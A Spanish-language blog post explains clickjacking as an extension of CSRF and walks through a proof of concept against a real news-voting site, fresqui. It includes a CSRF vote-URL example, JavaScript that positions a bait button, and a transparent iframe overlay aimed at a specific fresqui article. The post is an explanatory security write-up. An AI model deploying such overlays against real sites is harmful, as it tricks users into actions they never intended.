Y es que en seguridad informática, todos los días suceden cosas graves, pero algunas, saltan a los medios populares, se convierten en “noticia” y perciben cierto protagonismo, como si otros problemas de seguridad, no fuesen igual de recientes y graves…pero vaya, esto es como cuando un caso de asesinato salta a la prensa amarillista: lo mismo.

El clickjacking no es un agujero de seguridad en si mismo, es una forma de darle la vuelta a las tecnologías que utilizamos hoy en día, para engañar al usuario y hacerle creer que ciertas cosas, son lo que realmente no son.

Este ataque consiste en cargar una página web externa dentro de un iframe invisible (con opacidad 0, por ejemplo) y poner debajo del iframe invisible (con menor z-index), elementos xhtml para que el usuario haga click, pero que realmente, tienen el iframe invisible encima, y es quien recibirá el click.

Dicho de otra forma, imaginaos un cristal (opacidad 0) con algo debajo, intentamos tocar con el dedo lo que hay debajo, pero tocamos el cristal, esto es lo mismo que sucede cuando ponemos un iframe con opacidad 0 (invisible) encima de ciertos elementos de nuestra web: el usuario irá a hacer click en nuestros elementos, pero hará click dentro del iframe.

Ahora imaginemos que cargamos en el iframe una página de noticias, como meneame, fresqui, o digg, lo volvemos transparente, y debajo metemos un botón que diga: haz click aquí, posicionándolo justo exactamente debajo de donde aparece el botón para votar a la noticia, dentro de la página de noticias.

Cuando el usuario haga click en nuestro botón, que está debajo del iframe transparente, justo donde está el botón para votar de la web de noticias que hay cargada dentro del iframe, hará click en el botón votar de la pagina que hay dentro del iframe.

Creo que lo mejor para acabar de entenderlo es una imagen:

Sin embargo, muchos de vosotros pensaréis: y para que tanta historia, si para simular el click de un usuario, podemos realizar la petición, cargando un iframe con la dirección de destino?…es decir, podemos realizar un ataque CSRF (Cross-site request forgery).

Para entrar bien a fondo en el tema del clickjacking, tenemos que comprender primero los ataques CSRF, ya que el clickjacking es una extensión de los CSRF (a mi modo de verlo :).

Un ataque CSRF consiste en que si en una web, digamos: http://www.example.com, hay una página de noticias, y para votar una noticia, digamos la noticia número 51, se usa un enlace tal como:

http://www.example.com/noticias.php?votar=51

Podríamos crear una página con un iframe invisible apuntando a esa dirección, y cuando el usuario entre a nuestra web, sin saberlo, votará la noticia 51.

Eso es un típico ejemplo de CSRF.

Sin embargo, cuando ese tipo de ataques empezó a popularizarse, muchos sitios web, como meneame, fresqui, etc empezaron a agregar números de control a las peticiones, es decir, para realizar acciones en la web, las peticiones deben incluir un número aleatorio que te dan cuando cargas la página, de esta forma, sin ese número, no puedes hacer una petición como la anterior y votar una noticia, además, el número de control cambia por cada petición que haces.

Con esta técnica, parecía que los CSRF habían muerto, y ahí es donde aparece el clickjacking, podemos crear una web, y utilizar lo explicado arriba, para inducir a un usuario a hacer click en un botón, que realmente tiene encima, de forma invisible, un botón de otra web.

De esta forma, los números de control son enviados por el javascript de la página original, y todo sucede de forma normal.

Cabe decir, después de toda esta explicación, que existen alguna páginas que no son vulnerables a este ataque, como por ejemplo meneame, ya que no permite que cargues la web dentro de un iframe, lo mismo pasa con gmail, entre otras.

Aunque a mi me gusta hacer los experimentos con meneame, contactar con Ricardo antes de publicar nada, para que lo arregle, y entonces hacer el artículo, esta vez no puedo, por que meneame no es vulnerable a clickjacking, así que voy a hacer el experimento con fresqui.

He creado una página que utilizando las técnicas de clickjacking, crea un botón, que de pulsarlo, estarías votando esta noticia de fresqui:

http://tec.fresqui.com/cientificos-descubren-que-el-sol-no-es-una-esfera-perfecta

El ejemplo, lo podéis ver aquí, y solo funciona en firefox (paso de internet explorer :):

http://eyeideas.es/clickjacking.html

Como se puede ver en el código, hay una función javascript:

function initBoton() {
var obj = document.getElementById(“boton”);
var myWidth = 0, myHeight = 0;
if( typeof( window.innerWidth ) == ‘number’ ) {
//Non-IE
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
//IE 6+ in ‘standards compliant mode’
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
//IE 4 compatible
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}
var finalW = myWidth-910;
finalW = finalW/2;
//910-722 = 188 (mas tamaño…238)
finalW = finalW + 248;
obj.style.position=’absolute';
obj.style.right=finalW+’px';
obj.style.top=’244px';
obj.style.display=’block';
}

Que de forma un poco sucia, posiciona el botón rojo justo debajo del botón para votar la noticia en fresqui.

El iframe es algo así:

<iframe src=”http://tec.fresqui.com/cientificos-descubren-que-el-sol-no-es-una-esfera-perfecta&#8221; style=”opacity:0;position:absolute;top:0px;left:0px;width:99%;height:95%;margin:0px;padding:0px;z-index:100;”></iframe>

Como conclusión, decir que el ataque no es tan peligroso como lo pintan, aunque tiene su potencial impacto en la seguridad del usuario.

Por cierto, el ejemplo no se lo bien que irá en otras resoluciones y tal, he intentado hacerlo bastante portable, pero no lo he probado en otro sistema mas que el mio, es una simple prueba de concepto.



Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.